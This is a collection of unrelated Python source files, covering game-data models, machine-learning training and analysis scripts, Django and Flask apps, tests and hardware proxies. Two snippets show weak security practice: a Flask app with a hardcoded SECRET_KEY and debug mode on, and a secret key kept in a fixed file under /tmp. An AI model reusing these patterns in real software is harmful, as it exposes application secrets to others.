def iso_country_to_countryname(isocode):
isocode = isocode.upper()
if isocode == 'BAY':
country = 'Bavaria'
elif isocode == 'TEX':
country = 'Texas'
else:
try:
country = pycountry.countries.get(alpha2=isocode).name
except KeyError:
country = 'Omsk'
return country
def get_secret_key():
secretfile = os.path.join('/tmp', 'rfksecret')
with lockfile.FileLock(secretfile):
if not os.path.exists(secretfile):
with open(secretfile,'wb') as f:
f.write(os.urandom(64))
with open(secretfile, 'rb') as f: # read back as bytes; the file was written with os.urandom
return f.read()
|
python
|
from typing import List, Iterator, Dict
from pyot.conf.model import models
from pyot.core.functional import cache_indexes, lazy_property
from pyot.core.exceptions import NotFound
from pyot.utils.tft.cdragon import abs_url, join_set_data
from pyot.utils.lol.cdragon import sanitize
from .base import PyotCore, PyotStatic
# PYOT STATIC OBJECT
class TraitEffectData(PyotStatic):
max_units: int
min_units: int
style: int
variables: Dict[str, int]
class Meta(PyotStatic.Meta):
raws = {"variables"}
# PYOT CORE OBJECT
class Trait(PyotCore):
set: int
key: str
name: str
effects: List[TraitEffectData]
icon_path: str
description: str
class Meta(PyotCore.Meta):
rules = {"cdragon_tft_full": ["?set", "?key", "version", "locale"]}
renamed = {"api_name": "key", "desc": "description", "icon": "icon_path"}
def __init__(self, key: str = None, set: int = None, version: str = models.tft.DEFAULT_VERSION, locale: str = models.lol.DEFAULT_LOCALE):
self.initialize(locals())
if key and set is None:
self.find_set()
def find_set(self):
try:
self.set = int(self.key.split("_")[0][3:])
except Exception as e:
raise TypeError("Could not parse 'set' value from key") from e
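# Hedged example of the parsing above (assumes cdragon-style api names such as
# "Set5_Brawler"): key.split("_")[0] -> "Set5", "Set5"[3:] -> "5", so set == 5.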
@cache_indexes
def filter(self, indexer, data):
return indexer.get(self.key, join_set_data(data, self.set, "traits"), "apiName")
@lazy_property
def icon_abspath(self) -> str:
return abs_url(self.icon_path, self.metaroot.version)
@lazy_property
def cleaned_description(self) -> str:
return sanitize(self.description)
class Traits(PyotCore):
set: int
traits: List[Trait]
class Meta(PyotCore.Meta):
rules = {"cdragon_tft_full": ["?set", "version", "locale"]}
def __init__(self, set: int = -1, version: str = models.tft.DEFAULT_VERSION, locale: str = models.lol.DEFAULT_LOCALE):
self.initialize(locals())
def __getitem__(self, item):
if not isinstance(item, int):
return super().__getitem__(item)
return self.traits[item]
def __iter__(self) -> Iterator[Trait]:
return iter(self.traits)
def __len__(self):
return len(self.traits)
def filter(self, data):
try:
return join_set_data(data, self.set, "traits")
except KeyError as e:
raise NotFound("Request was successful but filtering gave no matching item") from e
def transform(self, data):
return {"traits": data}
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Authors: Olexa Bilaniuk
# Imports.
import sys; sys.path += [".", ".."]
import argparse as Ap
import logging as L
import numpy as np
import os, pdb, sys
import time
import tensorflow.compat.v1 as tf
__version__ = "0.0.0"
config = tf.ConfigProto()
# config.gpu_options.per_process_gpu_memory_fraction = 0.9
config.gpu_options.allow_growth = True
tf.Session(config=config)
#
# Message Formatter
#
class MsgFormatter(L.Formatter):
"""Message Formatter
Formats messages with time format YYYY-MM-DD HH:MM:SS.mmm TZ
"""
def formatTime(self, record, datefmt):
t = record.created
timeFrac = abs(t-int(t))
timeStruct = time.localtime(record.created)
timeString = ""
timeString += time.strftime("%F %T", timeStruct)
timeString += "{:.3f} ".format(timeFrac)[1:]
timeString += time.strftime("%Z", timeStruct)
return timeString
#############################################################################################################
############################## Subcommands ##################################
#############################################################################################################
class Subcommand(object):
name = None
@classmethod
def addArgParser(cls, subp, *args, **kwargs):
argp = subp.add_parser(cls.name, usage=cls.__doc__, *args, **kwargs)
cls.addArgs(argp)
argp.set_defaults(__subcmdfn__=cls.run)
return argp
@classmethod
def addArgs(cls, argp):
pass
@classmethod
def run(cls, d):
pass
class Screw(Subcommand):
"""Screw around with me in Screw(Subcommand)."""
name = "screw"
@classmethod
def run(cls, d):
print(cls.__doc__)
class Train(Subcommand):
name = "train"
LOGLEVELS = {"none":L.NOTSET, "debug": L.DEBUG, "info": L.INFO,
"warn":L.WARN, "err": L.ERROR, "crit": L.CRITICAL}
@classmethod
def addArgs(cls, argp):
argp.add_argument("-d", "--datadir", default=".", type=str,
help="Path to datasets directory.")
argp.add_argument("-w", "--workdir", default=".", type=str,
help="Path to the workspace directory for this experiment.")
argp.add_argument("-l", "--loglevel", default="info", type=str,
choices=cls.LOGLEVELS.keys(),
help="Logging severity level.")
argp.add_argument("-s", "--seed", default=0xe4223644e98b8e64, type=int,
help="Seed for PRNGs.")
argp.add_argument("--summary", action="store_true",
help="""Print a summary of the network.""")
argp.add_argument("--model", default="complex", type=str,
choices=["real", "complex"],
help="Model Selection.")
argp.add_argument("--dataset", default="cifar10", type=str,
choices=["mnist","cifar10", "others"],
help="Dataset Selection.")
argp.add_argument("--dropout", default=0, type=float,
help="Dropout probability.")
argp.add_argument("-n", "--num-epochs", default=200, type=int,
help="Number of epochs")
argp.add_argument("-b", "--batch-size", default=64, type=int,
help="Batch Size")
argp.add_argument("--start-filter", "--sf", default=11, type=int,
help="Number of feature maps in starting stage")
argp.add_argument("--num-blocks", "--nb", default=10, type=int,
help="Number of blocks.")
argp.add_argument("--spectral-param", action="store_true",
help="""Use spectral parametrization.""")
argp.add_argument("--spectral-pool-gamma", default=0.50, type=float,
help="""Use spectral pooling, preserving a fraction gamma of frequencies""")
argp.add_argument("--spectral-pool-scheme", default="none", type=str,
choices=["none", "stagemiddle", "proj", "nodownsample"],
help="""Spectral pooling scheme""")
argp.add_argument("--act", default="relu", type=str,
choices=["relu"],
help="Activation.")
argp.add_argument("--aact", default="modrelu", type=str,
choices=["modrelu"],
help="Advanced Activation.")
argp.add_argument("--no-validation", action="store_true",
help="Do not create a separate validation set.")
argp.add_argument("--comp_init", default='complex_independent', type=str,
help="Initializer for the complex kernel.")
optp = argp.add_argument_group("Optimizers", "Tunables for all optimizers")
optp.add_argument("--optimizer", "--opt", default="nag", type=str,
choices=["sgd", "nag", "adam", "rmsprop"],
help="Optimizer selection.")
optp.add_argument("--clipnorm", "--cn", default=1.0, type=float,
help="The norm of the gradient will be clipped at this magnitude.")
optp.add_argument("--clipval", "--cv", default=1.0, type=float,
help="The values of the gradients will be individually clipped at this magnitude.")
optp.add_argument("--l1", default=0, type=float,
help="L1 penalty.")
optp.add_argument("--l2", default=0, type=float,
help="L2 penalty.")
optp.add_argument("--lr", default=1e-3, type=float,
help="Master learning rate for optimizers.")
optp.add_argument("--momentum", "--mom", default=0.9, type=float,
help="Momentum for optimizers supporting momentum.")
optp.add_argument("--decay", default=0, type=float,
help="Learning rate decay for optimizers.")
optp.add_argument("--schedule", default="default", type=str,
help="Learning rate schedule")
optp = argp.add_argument_group("Adam", "Tunables for Adam optimizer")
optp.add_argument("--beta1", default=0.9, type=float,
help="Beta1 for Adam.")
optp.add_argument("--beta2", default=0.999, type=float,
help="Beta2 for Adam.")
optp.add_argument('--input_shape', default=(256,256,3*2))
@classmethod
def run(cls, d):
if not os.path.isdir(d.workdir):
os.mkdir(d.workdir)
logDir = os.path.join(d.workdir, "logs")
if not os.path.isdir(logDir):
os.mkdir(logDir)
logFormatter = MsgFormatter ("[%(asctime)s ~~ %(levelname)-8s] %(message)s")
stdoutLogSHandler = L.StreamHandler(sys.stdout)
stdoutLogSHandler .setLevel (cls.LOGLEVELS[d.loglevel])
stdoutLogSHandler .setFormatter (logFormatter)
defltLogger = L.getLogger ()
defltLogger .setLevel (cls.LOGLEVELS[d.loglevel])
defltLogger .addHandler (stdoutLogSHandler)
trainLogFilename = os.path.join(d.workdir, "logs", "train.txt")
trainLogFHandler = L.FileHandler (trainLogFilename, "a", "UTF-8", delay=True)
trainLogFHandler .setLevel (cls.LOGLEVELS[d.loglevel])
trainLogFHandler .setFormatter (logFormatter)
trainLogger = L.getLogger ("train")
trainLogger .setLevel (cls.LOGLEVELS[d.loglevel])
trainLogger .addHandler (trainLogFHandler)
entryLogFilename = os.path.join(d.workdir, "logs", "entry.txt")
entryLogFHandler = L.FileHandler (entryLogFilename, "a", "UTF-8", delay=True)
entryLogFHandler .setLevel (cls.LOGLEVELS[d.loglevel])
entryLogFHandler .setFormatter (logFormatter)
entryLogger = L.getLogger ("entry")
entryLogger .setLevel (cls.LOGLEVELS[d.loglevel])
entryLogger .addHandler (entryLogFHandler)
np.random.seed(d.seed % 2**32)
import training;training.train(d)
#############################################################################################################
############################## Argument Parsers #################################
#############################################################################################################
def getArgParser(prog):
argp = Ap.ArgumentParser(prog = prog,
usage = None,
description = None,
epilog = None
)
subp = argp.add_subparsers()
argp.set_defaults(argp=argp)
argp.set_defaults(subp=subp)
# Add global args to argp here?
# ...
# Add subcommands
for v in globals().values():
if(isinstance(v, type) and
issubclass(v, Subcommand) and
v != Subcommand):
v.addArgParser(subp)
# Return argument parser.
return argp
#############################################################################################################
############################## Main ##################################
#############################################################################################################
def main(argv):
sys.setrecursionlimit(10000)
d = getArgParser(argv[0]).parse_args(argv[1:])
return d.__subcmdfn__(d)
if __name__ == "__main__":
main(sys.argv)
|
python
|
from django.db import models
from django_handleref.models import HandleRefModel
class Org(HandleRefModel):
name = models.CharField(max_length=255, unique=True)
website = models.URLField(blank=True)
notes = models.TextField(blank=True)
class HandleRef:
tag = 'org'
delete_cascade = ["sub_entities"]
def __unicode__(self):
return self.name
class Sub(HandleRefModel):
name = models.CharField(max_length=255, unique=True)
org = models.ForeignKey(Org, on_delete=models.CASCADE, related_name="sub_entities")
class HandleRef:
tag = 'sub'
def __unicode__(self):
return self.name
class Widget(HandleRefModel):
name = models.CharField(max_length=255, unique=True)
class HandleRef:
custom_option = "passthrough"
|
python
|
import os
import pickle
import yaml
import numpy as np
import pandas as pd
import pyprind
from stats.plot_utils import get_dn_rn_info, load_best_rl
from stats.thresholds import th
rng = np.random.RandomState(123)
ROOT_DIR = os.path.abspath(".")
RAW = False # True == num patients ; False == percentage
# Make plots directory if it doesn't already exist
plot_path = os.path.join(ROOT_DIR, "plots")
if not os.path.exists(plot_path):
os.makedirs(plot_path)
root_dir_mimic = os.path.join(ROOT_DIR, 'data', 'sepsis_mimiciii')
# Currently hard-coded for the illustrative run1 defined in `config_sepsis.yaml`
root_dir_run = os.path.join(ROOT_DIR, 'results', 'run1')
params = yaml.safe_load(open(os.path.join(root_dir_run, 'config.yaml'), 'r')) # the used params in the given run directory
sepsis_test_data = pd.read_csv(os.path.join(root_dir_mimic, 'sepsis_final_data_K1_test.csv'))
encoded_test_data = pd.read_csv(os.path.join(root_dir_run, 'encoded_test_data.csv'))
step_indices = [-19, -13, -7, -4, -3, -2]
print("Loading best Q-Networks and making Q-values ...")
qnet_dn = load_best_rl(root_dir_run, params, 'negative') # Initialize the D-Network and load the best parameters
qnet_rn = load_best_rl(root_dir_run, params, 'positive') # Initialize the R-Network and load the best parameters
data = get_dn_rn_info(qnet_dn, qnet_rn, encoded_test_data, sepsis_test_data) # Each network uses the same SC-Network (AIS)
with open("./plots/value_data.pkl", "wb") as f:
pickle.dump(data, f)
results = {"survivors": {}, "nonsurvivors": {}}
nonsurvivor_trajectories = sorted(data[data.category == -1].traj.unique().tolist())
survivor_trajectories = sorted(data[data.category == +1].traj.unique().tolist())
for i, trajectories in enumerate([nonsurvivor_trajectories, survivor_trajectories]):
if i == 0:
traj_type = "nonsurvivors"
print("----- Non-survivors")
else:
traj_type = "survivors"
print("+++++ Survivors")
dn_q_traj = []
rn_q_traj = []
dn_q_selected_action_traj = []
rn_q_selected_action_traj = []
bar = pyprind.ProgBar(len(trajectories))
for traj in trajectories:
bar.update()
d = data[data.traj == traj]
dn_q_traj.append(np.array(d.q_dn.to_numpy().tolist(), dtype=np.float32))
rn_q_traj.append(np.array(d.q_rn.to_numpy().tolist(), dtype=np.float32))
dn_q_selected_action = [d.q_dn.tolist()[t][d.a.tolist()[t]] for t in range(d.q_dn.shape[0])]
dn_q_selected_action_traj.append(dn_q_selected_action)
rn_q_selected_action = [d.q_rn.tolist()[t][d.a.tolist()[t]] for t in range(d.q_rn.shape[0])]
rn_q_selected_action_traj.append(rn_q_selected_action)
results[traj_type]["dn_q_selected_action_traj"] = dn_q_selected_action_traj
results[traj_type]["rn_q_selected_action_traj"] = rn_q_selected_action_traj
results[traj_type]["dn_v_median_traj"] = [np.median(q, axis=1) for q in dn_q_traj]
results[traj_type]["rn_v_median_traj"] = [np.median(q, axis=1) for q in rn_q_traj]
# results[traj_type]["dn_v_max_traj"] = [np.max(q, axis=1) for q in dn_q_traj]
# results[traj_type]["dn_v_max5_traj"] = [np.sort(q, axis=1)[:, -5] for q in dn_q_traj]
# results[traj_type]["rn_v_max_traj"] = [np.max(q, axis=1) for q in rn_q_traj]
# results[traj_type]["rn_v_max5_traj"] = [np.sort(q, axis=1)[:, -5] for q in rn_q_traj]
bokeh = {"time": [], "survivors": {}, "nonsurvivors": {}}
for i in ["survivors", "nonsurvivors"]:
bokeh[i] = {"V_D": {"red": [], "yellow": [], "noflag": []}, "Q_D": {"red": [], "yellow": [], "noflag": []},
"V_R": {"red": [], "yellow": [], "noflag": []}, "Q_R": {"red": [], "yellow": [], "noflag": []},
"V_FULL": {"red": [], "yellow": [], "noflag": []}, "Q_FULL": {"red": [], "yellow": [], "noflag": []}}
for i, time_index in enumerate(step_indices):
print("Time: {0:3} H".format((time_index + 1) * 4))
bokeh["time"].append(str((time_index + 1) * 4) + " Hours")
for traj_type in ["survivors", "nonsurvivors"]:
x = results[traj_type]
v_dn = np.array([v[time_index] for v in x["dn_v_median_traj"] if len(v) > abs(time_index)])
q_dn = np.array([q[time_index] for q in x["dn_q_selected_action_traj"] if len(q) > abs(time_index)])
v_rn = np.array([v[time_index] for v in x["rn_v_median_traj"] if len(v) > abs(time_index)])
q_rn = np.array([q[time_index] for q in x["rn_q_selected_action_traj"] if len(q) > abs(time_index)])
assert(len(v_dn) == len(v_rn))
assert(len(q_dn) == len(q_rn))
assert(len(v_dn) == len(q_rn))
if RAW:
l = 1
else:
l = len(v_dn)
bokeh[traj_type]["V_D"]["noflag"].append(sum(v_dn > th.dn_yel) / l)
bokeh[traj_type]["V_R"]["noflag"].append(sum(v_rn > th.rn_yel) / l)
bokeh[traj_type]["V_FULL"]["noflag"].append(sum(np.logical_or((v_dn > th.dn_yel), (v_rn > th.rn_yel))) / l)
bokeh[traj_type]["Q_D"]["noflag"].append(sum(q_dn > th.dn_yel) / l)
bokeh[traj_type]["Q_R"]["noflag"].append(sum(q_rn > th.rn_yel) / l)
bokeh[traj_type]["Q_FULL"]["noflag"].append(sum(np.logical_or((q_dn > th.dn_yel), (q_rn > th.rn_yel))) / l)
bokeh[traj_type]["V_D"]["red"].append(sum(v_dn < th.dn_red) / l)
bokeh[traj_type]["V_R"]["red"].append(sum(v_rn < th.rn_red) / l)
bokeh[traj_type]["V_FULL"]["red"].append(sum(np.logical_and((v_dn < th.dn_red), (v_rn < th.rn_red))) / l)
bokeh[traj_type]["Q_D"]["red"].append(sum(q_dn < th.dn_red) / l)
bokeh[traj_type]["Q_R"]["red"].append(sum(q_rn < th.rn_red) / l)
bokeh[traj_type]["Q_FULL"]["red"].append(sum(np.logical_and((q_dn < th.dn_red), (q_rn < th.rn_red))) / l)
bokeh[traj_type]["V_D"]["yellow"].append(sum(np.logical_and((v_dn <= th.dn_yel), (v_dn >= th.dn_red))) / l)
bokeh[traj_type]["V_R"]["yellow"].append(sum(np.logical_and((v_rn <= th.rn_yel), (v_rn >= th.rn_red))) / l)
bokeh[traj_type]["V_FULL"]["yellow"].append(sum(np.logical_or(
np.logical_and.reduce((v_dn <= th.dn_yel, v_dn >= th.dn_red, v_rn <= th.rn_yel)),
np.logical_and.reduce((v_rn <= th.rn_yel, v_rn >= th.rn_red, v_dn <= th.dn_yel))) ) / l)
bokeh[traj_type]["Q_D"]["yellow"].append(sum(np.logical_and((q_dn <= th.dn_yel), (q_dn >= th.dn_red))) / l)
bokeh[traj_type]["Q_R"]["yellow"].append(sum(np.logical_and((q_rn <= th.rn_yel), (q_rn >= th.rn_red))) / l)
bokeh[traj_type]["Q_FULL"]["yellow"].append(sum(np.logical_or(
np.logical_and.reduce((q_dn <= th.dn_yel, q_dn >= th.dn_red, q_rn <= th.rn_yel)),
np.logical_and.reduce((q_rn <= th.rn_yel, q_rn >= th.rn_red, q_dn <= th.dn_yel))) ) / l)
if RAW:
p = os.path.join(ROOT_DIR, "./plots/flag_data_raw.pkl")
else:
p = os.path.join(ROOT_DIR, "./plots/flag_data.pkl")
with open(p, "wb") as f:
pickle.dump(bokeh, f)
|
python
|
from setuptools import setup, find_packages
with open("requirements.txt") as f:
install_requires = f.read().strip().split("\n")
# get version from __version__ variable in erptn/__init__.py
from erptn import __version__ as version
setup(
name="erptn",
version=version,
description="Adaptation of ERPNext to the Tunisian market, following Tunisian standards, laws and needs",
author="amf",
author_email="[email protected]",
packages=find_packages(),
zip_safe=False,
include_package_data=True,
install_requires=install_requires
)
|
python
|
# Generated by Django 3.2.3 on 2021-08-12 05:23
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0004_auto_20210811_1941'),
]
operations = [
migrations.RenameField(
model_name='vehicle',
old_name='size',
new_name='vehicle_class',
),
]
|
python
|
num = int(input('Enter a number: '))
if num % 3 == 0:
print(f'The number {num} is divisible by 3.')
else:
print(f'The number {num} is not divisible by 3.')
if num % 7 == 0:
print(f'The number {num} is divisible by 7.')
else:
print(f'The number {num} is not divisible by 7.')
|
python
|
from flask import Flask, render_template, url_for
from forms import RegistrationForm, LoginForm
app = Flask(__name__)
app.config['SECRET_KEY'] = '23630345ae74e203656e76a7cab735a7'
posts = [
{
'author': 'Name',
'title': 'Blog post 1',
'content': 'First blog post',
'date_posted': 'April 20, 2018'
},
{
'author': 'Name2',
'title': 'Blog post 2',
'content': 'Second blog post',
'date_posted': 'April 22, 2018'
}
]
@app.route("/")
@app.route("/home")
def hello():
return render_template('home.html', posts=posts)
@app.route("/about")
def about():
return render_template('about.html', title='About')
@app.route("/register")
def register():
form = RegistrationForm()
return render_template('register.html', title='Register', form=form)
@app.route("/login")
def login():
form = LoginForm()
return render_template('login.html', title='Login', form=form)
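# A minimal sketch of handling submissions (assumes the forms come from Flask-WTF,
# i.e. they expose validate_on_submit, and that redirect is imported from flask):
#
# @app.route("/register", methods=['GET', 'POST'])
# def register():
#     form = RegistrationForm()
#     if form.validate_on_submit():
#         return redirect(url_for('hello'))
#     return render_template('register.html', title='Register', form=form)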
if __name__ == '__main__':
app.run(debug=True)
|
python
|
import time
import fitlog
def random_tmp_name():
# the random module is not used here because its seed has been fixed, which would repeat names
a = (time.time() * 1000) % 19260817
return "tmp_%d.txt" % a
|
python
|
import numpy as np
import myrand
import scipy.stats
import sys
import random
import pytest
class TestRandoms( ):
@classmethod
@pytest.fixture(scope="class")
def setUpClass(cls):
print("Doing setUpClass")
cls.numVals = 10000
#print(vars(self))
#print(self)
@pytest.fixture(scope="function")
def setUp(self, request, setUpClass):
print("Doing setUp")
self.vals = np.zeros((10), dtype=np.int32)
self.randGen = myrand.MyRand( )
def tearDown(self):
pass
print("Doing tearDown")
self.randGen.reset( )
# request.addfinalizer(tearDown)
def test_bad(self, setUp, setUpClass):
print("Doing test_bad")
x0 = 15
p1 = 50
p2 = 100
modulus = 2217
self.randGen.set(p1, p2, x0, modulus)
for i in range(self.numVals):
tmp = self.randGen.next( )
tmp = tmp % 10
self.vals[tmp] = self.vals[tmp] + 1
chi2, p = scipy.stats.chisquare(self.vals)
assert p < 0.05
def test_better(self, setUp, setUpClass):
print("Doing test_better")
x0 = 79
p1 = 263
p2 = 71
modulus = sys.maxsize
self.randGen.set(p1, p2, x0, modulus)
for i in range(self.numVals):
tmp = self.randGen.next( )
tmp = tmp % 10
self.vals[tmp] = self.vals[tmp] + 1
chi2, p = scipy.stats.chisquare(self.vals)
assert p > 0.05
def test_builtin(self, setUp, setUpClass):
print("Doing test_builtin")
for i in range(self.numVals):
tmp = random.randint(0, 9)
self.vals[tmp] = self.vals[tmp] + 1
chi2, p = scipy.stats.chisquare(self.vals)
assert p > 0.05
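# Note on the assertions above: scipy.stats.chisquare with no f_exp compares the
# observed digit counts against a uniform expectation, so p > 0.05 means the last
# digits look uniform while p < 0.05 flags the deliberately bad parameters.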
|
python
|
"""Proxy objects for sending commands to transports"""
import logging
# We need to offset the pin numbers to CR and LF which are control characters to us
# NOTE: this *must* be same as in ardubus.h
# TODO: Use hex encoded values everywhere to avoid this
IDX_OFFSET = 32
LOGGER = logging.getLogger(__name__)
def idx2byte(idx):
"""Offset the idx number and return the bytes object"""
return bytes([idx + IDX_OFFSET])
def value2safebyte(value):
"""Take boolean or integer value, convert to byte making sure it's not too large or reserved control char"""
if isinstance(value, bool):
if value:
return b'1'
return b'0'
if not isinstance(value, int):
raise RuntimeError('Input must be int or bool')
if value > 255:
raise RuntimeError('Input is too large')
if value in [13, 10]:
value += 1
return bytes([value])
class BaseProxy:
"""Baseclass for the object proxies"""
alias = None
transport = None
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __str__(self):
return '<{}({})>'.format(self.__class__.__name__, self.__dict__)
def __repr__(self):
return str(self)
async def set_value(self, value):
"""In most cases simple value is enough, needs transport set"""
if not self.transport:
raise RuntimeError('Transport must be set to use this method')
return await self.transport.send_command(self.encode_value(value))
def encode_value(self, value):
"""In most cases simple value is enough, returns the encoded command for transport"""
raise NotImplementedError('Must be overridden')
class SimpleProxy(BaseProxy):
"""For very simple cases"""
idx = 0
_command_char = None
def encode_value(self, value):
if self._command_char is None:
raise RuntimeError('command_char must be defined')
return self._command_char + idx2byte(self.idx) + value2safebyte(value)
class PWMProxy(SimpleProxy):
"""MCU PWM output pins"""
_command_char = b'P'
class PinProxy(SimpleProxy):
"""For digital output pins without PWM"""
_command_char = b'D'
class AirCoreProxy(BaseProxy):
"""AirCore motor proxy"""
board_idx = 0
motorno = 0
value_correction = 0
def encode_value(self, value):
"""the value is the aircore position"""
value = (value + self.value_correction) % 255
return b'A' + idx2byte(self.board_idx) + idx2byte(self.motorno) + value2safebyte(value)
class JBOLLedProxy(BaseProxy):
"""Proxy for LEDs controlled with JBOL boards"""
board_idx = 0
ledno = 0
async def reset(self):
"""Reset all PCA9635 devices on the bus"""
if not self.transport:
raise RuntimeError('Transport must be set to use this method')
return await self.transport.send_command(b'j')
def encode_value(self, value):
"""the value is the LED PWM"""
return b'J' + idx2byte(self.board_idx) + idx2byte(self.ledno) + value2safebyte(value)
class SPI595Proxy(BaseProxy):
"""595 Shift registers"""
idx = 0
def encode_value(self, value):
"""the value is the aircore position"""
return b'W' + idx2byte(self.idx) + (b'%0.2X' % value)
def get_bitproxy(self, bit_idx):
"""Get a proxy object for given bit on this register"""
return SPI595BitProxy(idx=8 * self.idx + bit_idx, transport=self.transport)
async def set_bit(self, bit_idx, value):
"""Set single bit on this board to value"""
if not self.transport:
raise RuntimeError('Transport must be set to use this method')
return await self.transport.send_command(self.encode_bit(bit_idx, value))
def encode_bit(self, bit_idx, value):
"""encoding method for set_bit"""
bitproxy = self.get_bitproxy(bit_idx)
return bitproxy.encode_value(value)
class SPI595BitProxy(SimpleProxy):
"""Single bit access to the shift registers"""
_command_char = b'B'
class PCA9535PinProxy(SimpleProxy):
"""Single pin=bit access to the IO expander"""
_command_char = b'E'
class I2CASCIIProxy(BaseProxy):
"""I2C ASCII 7-segment display boards"""
board_idx = 0
max_chars = None
def encode_value(self, value):
"""The value must be bytes or string (which will be encoded to ASCII)"""
if isinstance(value, str):
value = value.encode('ascii')
if not isinstance(value, bytes):
raise RuntimeError('Input must be bytes or str')
if self.max_chars is not None:
if len(value) > self.max_chars:
LOGGER.warning('Input is longer than {}, truncating'.format(self.max_chars))
value = value[0:self.max_chars]
return b'w' + idx2byte(self.board_idx) + value
class ServoProxy(BaseProxy):
"""For servo control"""
idx = 0
def encode_value(self, value):
"""Values over 255 are considered usec, lower are considered degrees, max degrees is 180"""
if not isinstance(value, int):
raise RuntimeError('Values must be integers')
if value < 0:
raise RuntimeError('Values must be positive')
# usec
if value > 255:
return b's' + idx2byte(self.idx) + (b'%0.4X' % value)
# degrees
if value > 180:
LOGGER.warning('Degrees value is over 180, limiting')
value = 180
return b'S' + idx2byte(self.idx) + value2safebyte(value)
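# Hedged wire-format examples derived from the encoders above (transport not shown):
# PWMProxy(idx=2).encode_value(128) -> b'P' + bytes([2 + 32]) + bytes([128])
# ServoProxy(idx=2).encode_value(90) -> b'S' + bytes([2 + 32]) + bytes([90]) # degrees
# ServoProxy(idx=2).encode_value(1500) -> b's' + bytes([2 + 32]) + b'05DC' # microseconds, hex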
|
python
|
import numpy as np
import itertools as itr
import os as os
import sys as sys
import matplotlib.pyplot as plt
class GridTopology:
r"""
Control the layout/connectivity of the lattice the models are based on.
This can be used as a parent class for other topologies.
Here sites are assigned unique indices,
and we use Cartesian coordinates for site positions.
:param int dimension: dimension of system
:param int num_sites: initial number of sites in the system
:param int maximum_connection_distance: upper limit of
absolute distance between sites of nearest neighbours
to be considered "connected".
:param bool linear_connections_only:
True: only allow connectivity if sites share an axis
False: allow connectivity if absolute distance between sites
less than maximum_connection_distance
:param bool all_sites_connected:
True: all sites connected
False: connectivity based on above criteria
"""
def __init__(
self,
dimension=2,
num_sites=1,
maximum_connection_distance=1,
# to count as connected, i.e. 1 is nearest neighbours
linear_connections_only=True,
all_sites_connected=False,
):
self.dimension = dimension
self.maximum_connection_distance = maximum_connection_distance
self.only_linearly_connections = linear_connections_only
self.connect_all_sites = all_sites_connected
self.occupation = {"rows": {1: [1]}, "cols": {1: [1]}}
self.coordinates = {1: [1, 1]}
self.nearest_neighbours = {1: []}
self.site_connections = {1: []}
self.new_connections = []
self.new_site_indices = []
for i in range(1, num_sites):
self.add_site()
def add_site(self):
r"""
Add site to current state of topology.
In multiple dimensions, sites are added so as to minimise the total area of the lattice.
Connectivities are updated.
"""
if self.dimension == 1:
new_site_idx = self.add_site_1d_grid()
elif self.dimension == 2:
new_site_idx = self.add_site_2d_grid()
self.new_site_indices.append([new_site_idx])
this_site_new_connections = []
new_coordinate = self.coordinates[new_site_idx]
self.nearest_neighbours[new_site_idx] = []
self.site_connections[new_site_idx] = []
other_sites = list(set(self.site_indices) - set([new_site_idx]))
for i in other_sites:
other_coords = self.coordinates[i]
nearest_neighbour = self.check_nearest_neighbour_sites(
site_1=new_coordinate, site_2=other_coords
)
if nearest_neighbour is True:
if i not in self.nearest_neighbours[new_site_idx]:
try:
self.nearest_neighbours[new_site_idx].append(i)
except BaseException:
self.nearest_neighbours[new_site_idx] = [i]
if new_site_idx not in self.nearest_neighbours[i]:
try:
self.nearest_neighbours[i].append(new_site_idx)
except BaseException:
self.nearest_neighbours[i] = [new_site_idx]
connected_sites, shared_axis = self.check_sites_connection(
site_1_idx=i, site_2_idx=new_site_idx
)
if self.connect_all_sites == True or (
connected_sites == True
and (shared_axis == True or self.only_linearly_connections == False)
):
conn = tuple(sorted([i, new_site_idx]))
this_site_new_connections.append(conn)
if i not in self.site_connections[new_site_idx]:
try:
self.site_connections[new_site_idx].append(i)
except BaseException:
self.site_connections[new_site_idx] = [i]
if new_site_idx not in self.site_connections[i]:
try:
self.site_connections[i].append(new_site_idx)
except BaseException:
self.site_connections[i] = [new_site_idx]
self.new_connections.append(this_site_new_connections)
@property
def site_indices(self):
r"""Unique site indices list."""
return list(self.coordinates.keys())
def num_sites(self):
r"""Number of sites in the topology currently."""
return len(list(self.coordinates.keys()))
def check_nearest_neighbours_from_indices(self, idx_1, idx_2):
r"""Check if two sites are nearest neighbours, given their indices."""
site_1 = self.coordinates[idx_1]
site_2 = self.coordinates[idx_2]
print("Site 1:", site_1)
print("Site 2:", site_2)
return self.check_nearest_neighbour_sites(site_1, site_2)
def check_nearest_neighbour_sites(self, site_1, site_2):
r"""Check if two sites are nearest neighbours, given their locations."""
# simply checks whether sites are adjacent (or computes the distance)
# assumes Cartesian coordinates
if len(site_1) != len(site_2):
print(
"Site distance calculation: both sites must have same number of dimensions.",
"Given:",
site_1,
site_2,
)
raise NameError("Unequal site dimensions.")
dim = len(site_1)
dist = 0
for d in range(dim):
dist += np.abs(site_1[d] - site_2[d])
if dist == 1:
return True
else:
return False
def get_distance_between_sites(self, site_1_idx, site_2_idx):
r"""Compute distance between two sites, given their indices."""
site_1 = self.coordinates[site_1_idx]
site_2 = self.coordinates[site_2_idx]
if len(site_1) != len(site_2):
print(
"Site distance calculation: both sites must ",
"have same number of dimensions.",
"Given:",
site_1,
site_2,
)
raise NameError("[Topology] Unequal site dimensions.")
dim = len(site_1)
dist = 0
shared_axis = False
for d in range(dim):
dist += np.abs(site_1[d] - site_2[d]) ** 2
if site_1[d] == site_2[d]:
shared_axis = True
dist = np.sqrt(dist)
return dist, shared_axis
def check_sites_connection(self, site_1_idx, site_2_idx):
r"""Checks whether two site indices are considered connected."""
dist, shared_axis = self.get_distance_between_sites(site_1_idx, site_2_idx)
if dist <= self.maximum_connection_distance:
connected = True
else:
connected = False
return connected, shared_axis
def get_connected_site_list(self):
r"""Return list of tuples of connected sites' indices."""
coordinates = self.coordinates
site_indices = list(coordinates.keys())
connected_sites = []
for i in range(len(site_indices)):
idx_1 = site_indices[i]
for j in range(i + 1, len(site_indices)):
idx_2 = site_indices[j]
connected, shared_axis = self.check_sites_connection(
site_1_idx=idx_1, site_2_idx=idx_2
)
if self.connect_all_sites == True or (
connected == True
and (shared_axis == True or self.only_linearly_connections == False)
):
connected_sites.append((idx_1, idx_2))
return connected_sites
def get_nearest_neighbour_list(self):
r"""Return list of tuples of nearest-neighbours sites' indices."""
coordinates = self.coordinates
site_indices = list(coordinates.keys())
nearest_neighbours = []
for i in range(len(site_indices)):
idx_1 = site_indices[i]
